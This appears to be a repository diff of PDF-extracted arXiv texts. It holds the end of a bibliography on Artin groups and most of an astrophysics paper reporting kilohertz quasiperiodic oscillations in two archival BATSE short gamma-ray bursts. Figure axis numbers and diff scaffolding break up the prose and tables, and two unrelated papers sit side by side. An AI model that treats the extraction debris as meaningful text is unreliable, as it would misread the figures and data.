+ Thomas Haettel. XXL type Artin groups are CAT(0) and acylindrically hyperbolic. Ann. Inst. Fourier (Greno-
1558
+ ble), 72(6):2541–2555, 2022.
1559
+ [HMS21]
1560
+ Mark Hagen, Alexandre Martin, and Alessandro Sisto. Extra-large type artin groups are hierarchically hyperbolic,
1561
+ 2021.
1562
+ [HO19]
1563
+ Jingyin Huang and Damian Osajda. Metric systolicity and two-dimensional Artin groups. Math. Ann., 374(3-
1564
+ 4):1311–1352, 2019.
1565
+ [HO20]
1566
+ Jingyin Huang and Damian Osajda. Large-type Artin groups are systolic. Proc. Lond. Math. Soc. (3), 120(1):95–
1567
+ 123, 2020.
1568
+ [KO22]
1569
+ Motoko Kato and Shin-ichi Oguni. Acylindrical hyperbolicity of artin groups associated with graphs that are not
1570
+ cones, 2022.
1571
+ [Mar22]
1572
+ Alexandre Martin. The Tits alternative for two-dimensional Artin groups and Wise’s Power Alternative, 2022.
1573
+ [Vas22a]
1574
+ Nicolas Vaskou. Acylindrical hyperbolicity for Artin groups of dimension 2. Geom. Dedicata, 216(1):Paper No.
1575
+ 7, 28, 2022.
1576
+ [Vas22b]
1577
+ Nicolas Vaskou. Rigidity and automorphisms of large-type artin groups, 2022.
1578
+ [vdL83]
1579
+ H. van der Lek. The homotopy type of complex hyperplane complements. Katholieke Universiteit te Nijmegen,
1580
+ 1983.
1581
+ Department of Mathematics, Heriot-Watt University, Edinburgh, UK
1582
+ Email address: ag2017@hw.ac.uk
1583
+ Department of Mathematics, Heriot-Watt University, Edinburgh, UK
1584
+ Email address: ncv1@hw.ac.uk
1585
+
7dE2T4oBgHgl3EQf7gj3/content/tmp_files/load_file.txt ADDED
The diff for this file is too large to render. See raw diff
 
99E1T4oBgHgl3EQfCgIZ/content/tmp_files/2301.02864v1.pdf.txt ADDED
@@ -0,0 +1,2646 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ Springer Nature 2021 LATEX template
2
+ Kilohertz quasiperiodic oscillations in short gamma-ray bursts
3
+ Cecilia Chirenti1,2,3,4*, Simone Dichiara5, Amy Lien6, M. Coleman Miller1
4
+ and Robert Preece7
5
+ 1*Department of Astronomy, University of Maryland, College Park, 20742, MD, USA.
6
+ 2*Astroparticle Physics Laboratory, NASA/GSFC, Greenbelt, 20771, MD, USA.
7
+ 3*Center for Research and Exploration in Space Science and Technology, NASA/GSFC,
8
+ Greenbelt, 20771, MD, USA.
9
+ 4*Center for Mathematics, Computation and Cognition, UFABC, Santo Andre,
10
+ 09210-170, SP, Brazil.
11
+ 5Department of Astronomy and Astrophysics, The Pennsylvania State University, 525
12
+ Davey Lab, University Park, 16802, PA, USA.
13
+ 6Department of Chemistry, Biochemistry, and Physics, University of Tampa, 401 W.
14
+ Kennedy Blvd, Tampa, 33606, FL, USA.
15
+ 7Department of Space Science, University of Alabama in Huntsville, Huntsville, 35899,
16
+ AL, USA.
17
+ Abstract
18
+ Short γ-ray bursts are associated with binary neutron star mergers, which are multimessenger
19
+ astronomical events that have been observed both in gravitational waves and in the multiband elec-
20
+ tromagnetic spectrum [1]. Depending on the masses of the stars in the binary and on details of their
21
+ largely unknown equation of state, a dynamically evolving and short-lived neutron star may be formed
22
+ after the merger, existing for approximately 10-300 ms before collapsing to a black hole [2, 3]. Numer-
23
+ ical relativity simulations across different groups consistently show broad power spectral features in
24
+ the 1-5 kHz range in the post-merger gravitational wave signal [4–14], which is inaccessible by current
25
+ gravitational-wave detectors but could be seen by future third generation ground-based detectors in
26
+ the next decade [15–17]. This implies the possibility of quasiperiodic modulation of the emitted γ-rays
27
+ in a subset of events where a neutron star is formed shortly prior to the final collapse to a black hole
28
+ [18–21]. Here we present two such signals identified in the short bursts GRB 910711 and GRB 931101B
29
+ from archival BATSE data, which are compatible with the predictions from numerical relativity.
30
+ Given the anticipated high frequencies, we ana-
31
+ lyzed data from gamma-ray observatories with
32
+ excellent time resolution: the Fermi Gamma-ray
33
+ Burst Monitor (GBM) [22]; the Burst Alert Tele-
34
+ scope (BAT) on the Neil Gehrels Swift Observa-
35
+ tory [23], and the Compton Gamma-ray Observa-
36
+ tory (CGRO) Burst and Transient Source Exper-
37
+ iment (BATSE) in Time Tagged Event (TTE)
38
+ mode [24]. Previous searches for periodic signals in
39
+ gamma-ray bursts yielded null results [25–27], but
40
+ the dynamical nature of the merger suggests that
41
+ instead of periodic signals, quasiperiodic oscilla-
42
+ tions (QPOs) are more probable. We focused on
43
+ short gamma-ray bursts based on the expectation
44
+ that these are due to neutron star mergers and
45
+ thus could have an oscillatory phase, e.g., as a
46
+ 1
47
+ arXiv:2301.02864v1 [astro-ph.HE] 7 Jan 2023
48
+
49
+ Springer Nature 2021 LATEX template
50
+ 2
51
+ kHz QPOs in sGRBs
52
+ hypermassive neutron star (HMNS), which tem-
53
+ porarily avoids collapse to a black hole due to
54
+ the star’s differential rotation [28]. Figure 1 shows
55
+ that in these data sets, two BATSE bursts stand
56
+ out with strong signals. Figures 2, 3, and 4 show
57
+ respectively the light curves, power spectra, and
58
+ spectrograms for these two bursts, and Table 1
59
+ gives the properties of their QPOs. We find (see
60
+ Methods for details) that when all trials factors
61
+ are taken into account, the probability that the
62
+ combined catalogs of BATSE, GBM, and BAT
63
+ would produce false positive QPOs of the strength
64
+ we observe is ∼ 3 × 10−7.
65
+ 0.1
66
+ 1
67
+ 10
68
+ 100
69
+ 1000
70
+ 10000
71
+ -2
72
+ 0
73
+ 2
74
+ 4
75
+ 6
76
+ 8
77
+ 10
78
+ GRB
79
+ 910711
80
+ GRB
81
+ 931101B
82
+ # segments
83
+ log10(B1
84
+ 0)
85
+ CGRO/BATSE (high energy)
86
+ CGRO/BATSE
87
+ Fermi/GBM
88
+ Swift/BAT
89
+ Fig. 1 | Differential distribution of Bayes factors.
90
+ Here we plot, for different sets of ∼ 0.1-second segments
91
+ of short bursts, the log10 of the Bayes factor B1
92
+ 0 between
93
+ a model with one Lorentzian QPO plus white noise, and
94
+ a model with just white noise, in the frequency range
95
+ 500 − 5000 Hz [31]. In orange we show the distribution for
96
+ Swift/BAT bursts, in blue for Fermi/GBM bursts, in green
97
+ for CGRO/BATSE bursts when we sum the counts over
98
+ all four TTE energy channels, and in purple for CGRO/-
99
+ BATSE bursts when we sum only the counts from the two
100
+ highest TTE energy channels (i.e., energies > 100 keV).
101
+ In each case we have cleaned the sample by removing seg-
102
+ ments contaminated by cosmic ray spikes, excess red noise,
103
+ or other features which artificially increase the rate of false
104
+ positives. Most of these segments are consistent with noise,
105
+ but the two outliers on the BATSE high energy distribution
106
+ (in purple, extending to the right) have overwhelmingly
107
+ larger B1
108
+ 0 than the rest. These are the signals that we
109
+ investigate.
110
+ Both of our signals (out of more than 700
111
+ total bursts; see Methods) are in BATSE bursts,
112
+ which is to be expected because BATSE has a
113
+ larger detector area than GBM or BAT, which
114
+ makes it easier to detect modulations in the count
115
+ rate. This may suggest that future large-area
116
+ instruments with excellent time resolution, such as
117
+ STROBE-X [29] or AMEGO-X [30], will identify
118
+ burst QPOs that are currently too weak to detect.
119
+ The frequencies of the QPOs in our two
120
+ featured bursts are broadly consistent with the
121
+ expectations from numerical relativity simulations
122
+ of double neutron star mergers. Possible detec-
123
+ tions of kilohertz QPOs have also been reported
124
+ in giant flares from two soft gamma-ray repeaters
125
+ (SGRs) [34, 35], but the high implied isotropic
126
+ energies and luminosities of GRBs 910711 and
127
+ 931101B argue against the SGR giant flare inter-
128
+ pretation for our bursts (see Methods). We there-
129
+ fore adopt the hypothesis that these are classical
130
+ short gamma-ray bursts resulting from the merger
131
+ of two neutron stars. Even if this is the case it does
132
+ not necessarily follow that the QPOs we observe
133
+ come from the oscillations of an HMNS. It is, for
134
+ example, conceivable that the oscillations come
135
+ from a lower-mass neutron star or from some prop-
136
+ erties of accretion onto a black hole in the so-called
137
+ lower mass gap (2 − 5M⊙); further modeling will
138
+ as always be necessary.
139
+ 0
140
+ 50
141
+ 100
142
+ 150
143
+
144
+
145
+
146
+
147
+
148
+
149
+ 0
150
+ 50000
151
+ 100000
152
+ 150000
153
+ a
154
+ counts
155
+ counts/s
156
+ GRB910711
157
+ 0
158
+ 10
159
+ 20
160
+ 30
161
+ 0
162
+ 50
163
+ 100
164
+ 150
165
+ 200
166
+ 250
167
+ 0
168
+ 10000
169
+ 20000
170
+ 30000
171
+ b
172
+ counts
173
+ counts/s
174
+ time (ms)
175
+ GRB931101B
176
+ Fig. 2 | Light curves of the two bursts with signals.
177
+ a, Counts per 1.024-millisecond bin in the two highest-
178
+ energy channels (channels 3 and 4) in the BATSE TTE
179
+ data, for consecutive 1.024-millisecond intervals beginning
180
+ at the start of the TTE data for GRB 910711. b, The same,
181
+ for GRB 931101B. The signals were found in the segments
182
+ bracketed by the vertical dotted lines.
183
+
184
+ Springer Nature 2021 LATEX template
185
+ kHz QPOs in sGRBs
186
+ 3
187
+ If the high-frequency QPOs that we detect are
188
+ indeed related to HMNS oscillations, then the fre-
189
+ quencies detected in our signals can be compared
190
+ with several phenomenological relations identi-
191
+ fied for the frequencies observed in the simulated
192
+ post-merger gravitational waveforms from binary
193
+ neutron star mergers [10, 36–39]. For instance,
194
+ if the unknown redshift z of the sources can be
195
+ neglected, the frequencies ν2 of the main peak pre-
196
+ sented in Table 1 together with a phenomenologi-
197
+ cal relation obtained from simulations of mergers
198
+ of two 1.35 M⊙ neutron stars [40] suggest a radius
199
+ R1.6 ≃ 13 km for a 1.6 M⊙ neutron star. It is
200
+ unlikely that such a bright burst as GRB 910711
201
+ happened at a large redshift, but the redshift cor-
202
+ rection would mean that the rest-frame frequency
203
+ would be higher by a factor of 1 + z, and thus the
204
+ inferred radius would be smaller. The best esti-
205
+ mate of the radius decreases linearly with small z;
206
+ e.g., R1.6 ≃ 12.5 km for z = 0.1 and R1.6 ≃ 12.0
207
+ km for z = 0.2.
208
+ Another possible inference is that of the spin
209
+ of the HMNS. It is currently understood that
210
+ HMNSs are supported against gravitational col-
211
+ lapse by rapid and differential rotation. During
212
+ their brief lifetime, they should be the fastest
213
+ rotating stars known. Simulations show that the
214
+ frequency ν2 corresponds to twice the maximum
215
+ angular velocity inside the star [38], Ωmax. Our
216
+ results would imply Ωmax ∼ (1+z)1.3 kHz (allow-
217
+ ing for a redshift correction), which even at z = 0
218
+ is almost two times higher than any neutron star
219
+ spin frequency observed to date, and above the
220
+ expected Keplerian mass-shedding limit for a uni-
221
+ formly rotating HMNS, therefore being consistent
222
+ with the need for differential rotation.
223
+ Additional information could presumably be
224
+ provided by identification of the lower-frequency
225
+ peak ν1, but this is complicated by uncertainties in
226
+ the identification of the peak in different models as
227
+ well as the difficulty of accurate inclusion of fully
228
+ resolved neutrino physics, magnetohydrodynamic
229
+ turbulence, and so on in long-term numerical sim-
230
+ ulations. Moreover, because we observe gamma
231
+ rays rather than gravitational waves, additional
232
+ careful modeling of the jet is needed to draw a
233
+ connection between gravitational waveforms and
234
+ the observed modulations of gamma rays. For
235
+ example, fluctuations in the post-merger accre-
236
+ tion disk can also drive changes in the jet and
237
+ 0
238
+ 4
239
+ 8
240
+ 12
241
+
242
+
243
+
244
+
245
+
246
+ a
247
+ power
248
+ GRB910711
249
+ 0
250
+ 4
251
+ 8
252
+ 12
253
+ 1000
254
+ 2000
255
+ 3000
256
+ 4000
257
+ 5000
258
+ b
259
+ power
260
+ frequency (Hz)
261
+ GRB931101B
262
+ Fig. 3 | Power spectra of the two bursts with
263
+ signals. a, Power spectrum of GRB 910711. b, Power spec-
264
+ trum of GRB 931101B. Here we use the intervals delineated
265
+ by the vertical dashed lines in Figure 2. These each have a
266
+ duration of 0.131072 seconds and thus the frequency reso-
267
+ lution of the power spectrum is 1/0.131072 s = 7.6294 Hz.
268
+ We use the Groth power normalization [32], in which the
269
+ expected power averages 1 if the flux is intrinsically con-
270
+ stant and has only photon counting (Poisson) noise. In
271
+ addition to the power densities (red lines) we also show the
272
+ 1σ, 2σ and 3σ single-trial power ranges for the best white
273
+ noise only fits in each case (red bands) and the ±1σ range
274
+ for the power expected in the best two-QPO plus white
275
+ noise fits (grey bands). The corresponding best-fit values
276
+ are shown in Table 5 in Methods. The range of frequencies
277
+ shown in the figure, 500 − 5000 Hz, is what we use in our
278
+ QPO search and is intended to reach the highest plausible
279
+ oscillation frequencies but to avoid red noise at low frequen-
280
+ cies. We see that the two bursts have similar power density
281
+ structures, with clear peaks at ∼ 2600 Hz and ∼ 1000 Hz.
282
+ thus the observed GRB flux [41, 42]. Nonetheless,
283
+ the detection of these high-frequency QPOs pro-
284
+ vides a potentially powerful new tool to study the
285
+ dynamics and gravity of merging neutron stars.
286
+ References
287
+ [1] Abbott, B. P. et al. Multi-messenger Obser-
288
+ vations of a Binary Neutron Star Merger.
289
+ Astrophys. J. Lett. 848 (2), L12 (2017).
290
+ [2] Shapiro, S. L. Differential Rotation in Neu-
291
+ tron Stars: Magnetic Braking and Viscous
292
+
293
+ Springer Nature 2021 LATEX template
294
+ 4
295
+ kHz QPOs in sGRBs
296
+ Table 1 | Bursts with QPOs, Bayes factors and median and ±1σ values of central frequencies and widths
297
+ GRB
298
+ T90 (msec) Counts
299
+ B1
300
+ 0
301
+ B2
302
+ 0
303
+ ν1(Hz) ∆ν1 (Hz) ν2 (Hz) ∆ν2 (Hz)
304
+ 910711
305
+ 14 [33]
306
+ 1790
307
+ 6.5 × 108 3.0 × 1017 1113+7
308
+ −8
309
+ 25+9
310
+ −7
311
+ 2649+6
312
+ −7
313
+ 26+9
314
+ −7
315
+ 931101B
316
+ 34 [33]
317
+ 524
318
+ 1.9 × 104 3.6 × 106
319
+ 877+6
320
+ −8
321
+ 15+7
322
+ −2
323
+ 2612+9
324
+ −8
325
+ 14+7
326
+ −3
327
+ Note: The frequencies ν and half widths at half maximum ∆ν for the QPOs are from the two-QPO plus white noise fit to the
328
+ data from 500 Hz through 5000 Hz for a 0.131072-second segment of BATSE TTE data. (The one-QPO plus white noise fit to the
329
+ data, corresponding to Figure 1, finds only the second QPO listed here.) We analyze data only from the highest two of the four
330
+ BATSE TTE energy channels, and list the total number of counts in those two channels over the 0.131072-second segments that
331
+ contain the signals. T90 is the shortest time span that contains 90% of the burst counts and B1
332
+ 0 (B2
333
+ 0) is the Bayes factor between a
334
+ one-QPO (two-QPO) plus white noise model and a white noise only model. For the frequencies and frequency widths we give the
335
+ median and the ±1σ ranges.
336
+ 10
337
+ 20
338
+ 30
339
+
340
+
341
+
342
+
343
+
344
+
345
+
346
+ a
347
+ counts
348
+ GRB910711
349
+ 0
350
+ 20
351
+ 40
352
+ 60
353
+ 80
354
+ 100
355
+ 120
356
+ 1
357
+ 2
358
+ 3
359
+ 4
360
+ frequency (kHz)
361
+ 0
362
+ 2
363
+ 4
364
+ 6
365
+ 8
366
+ power
367
+ 2
368
+ 4
369
+ 6
370
+ 8
371
+
372
+
373
+
374
+
375
+
376
+
377
+
378
+ b
379
+ counts
380
+ GRB931101B
381
+ 0
382
+ 2
383
+ 4
384
+ 6
385
+ 8
386
+ power
387
+ 140
388
+ 160
389
+ 180
390
+ 200
391
+ 220
392
+ 240
393
+ 260
394
+ time (ms)
395
+ 1
396
+ 2
397
+ 3
398
+ 4
399
+ frequency (kHz)
400
+ 0
401
+ 2
402
+ 4
403
+ 6
404
+ 8
405
+ power
406
+ Fig. 4 | Spectrograms for the burst segments with
407
+ signals. a, Spectrogram for GRB 910711. b, Spectrogram
408
+ for GRB 931101B. Here we use the parts of the bursts
409
+ bracketed by the vertical dotted lines in Figure 2. For
410
+ each burst, the top panel shows the light curve binned
411
+ in 128-microsecond intervals (in contrast with the 1.024-
412
+ millisecond intervals of Figure 2). Each pixel shows the
413
+ power (indicated by the color bar) at the associated fre-
414
+ quency for an 8.192-msec interval, with a start time in
415
+ milliseconds given on the horizontal axis. The black arrows
416
+ indicate the mean values of the QPO frequencies given
417
+ in Table 1. The maximum power in a pixel is ∼ 16 for
418
+ GRB 910711 and ∼ 8 for GRB 931101B. Note that in
419
+ GRB 910711 there is substantial power at the main ∼
420
+ 2600 Hz frequency some 0.08 − 0.06 seconds before the
421
+ burst, which could indicate precursor emission.
422
+ Damping.
423
+ Astrophys. J. 544 (1), 397–408
424
+ (2000).
425
+ [3] Paschalidis, V., Etienne, Z. B. & Shapiro,
426
+ S. L. Importance of cooling in triggering the
427
+ collapse of hypermassive neutron stars. Phys.
428
+ Rev. D 86 (6), 064032 (2012).
429
+ [4] Shibata, M., Taniguchi, K. & Ury¯u, K.
430
+ Merger of binary neutron stars with realis-
431
+ tic equations of state in full general relativity.
432
+ Phys. Rev. D 71 (8), 084021 (2005).
433
+ [5] Shibata, M. Constraining Nuclear Equations
434
+ of State Using Gravitational Waves from
435
+ Hypermassive Neutron Stars.
436
+ Phys. Rev.
437
+ Lett. 94 (20), 201101 (2005).
438
+ [6] Liu, Y. T., Shapiro, S. L., Etienne, Z. B. &
439
+ Taniguchi, K. General relativistic simulations
440
+ of magnetized binary neutron star mergers.
441
+ Phys. Rev. D 78 (2), 024012 (2008).
442
+ [7] Baiotti, L., Giacomazzo, B. & Rezzolla, L.
443
+ Accurate evolutions of inspiralling neutron-
444
+ star binaries: Prompt and delayed collapse to
445
+ a black hole. Phys. Rev. D 78 (8), 084033
446
+ (2008).
447
+ [8] Hotokezaka, K. et al. Remnant massive neu-
448
+ tron stars of binary neutron star mergers:
449
+ Evolution process and gravitational wave-
450
+ form. Phys. Rev. D 88 (4), 044026 (2013).
451
+ [9] Takami, K., Rezzolla, L. & Baiotti, L. Con-
452
+ straining the Equation of State of Neutron
453
+ Stars from Binary Mergers. Phys. Rev. Lett.
454
+ 113 (9), 091104 (2014).
455
+ [10] Takami,
456
+ K.,
457
+ Rezzolla,
458
+ L.
459
+ &
460
+ Baiotti,
461
+ L.
462
+ Spectral
463
+ properties
464
+ of
465
+ the
466
+ post-merger
467
+
468
+ Springer Nature 2021 LATEX template
469
+ kHz QPOs in sGRBs
470
+ 5
471
+ gravitational-wave signal from binary neu-
472
+ tron stars.
473
+ Phys. Rev. D 91 (6), 064001
474
+ (2015).
475
+ [11] Dietrich, T., Bernuzzi, S., Ujevic, M. &
476
+ Br¨ugmann, B. Numerical relativity simula-
477
+ tions of neutron star merger remnants using
478
+ conservative mesh refinement. Phys. Rev. D
479
+ 91 (12), 124041 (2015).
480
+ [12] Ruiz, M., Lang, R. N., Paschalidis, V. &
481
+ Shapiro, S. L. Binary Neutron Star Mergers:
482
+ A Jet Engine for Short Gamma-Ray Bursts.
483
+ Astrophys. J. Lett. 824 (1), L6 (2016).
484
+ [13] Radice, D., Bernuzzi, S., Del Pozzo, W.,
485
+ Roberts, L. F. & Ott, C. D.
486
+ Probing
487
+ Extreme-density Matter with Gravitational-
488
+ wave Observations of Binary Neutron Star
489
+ Merger
490
+ Remnants.
491
+ Astrophys.
492
+ J.
493
+ Lett.
494
+ 842 (2), L10 (2017).
495
+ [14] Breschi, M., Bernuzzi, S., Godzieba, D.,
496
+ Perego, A. & Radice, D. Constraints on the
497
+ Maximum Densities of Neutron Stars from
498
+ Postmerger Gravitational Waves with Third-
499
+ Generation Observations.
500
+ Phys. Rev. Lett.
501
+ 128 (16), 161102 (2022).
502
+ [15] Punturo, M. et al. The Einstein Telescope: a
503
+ third-generation gravitational wave observa-
504
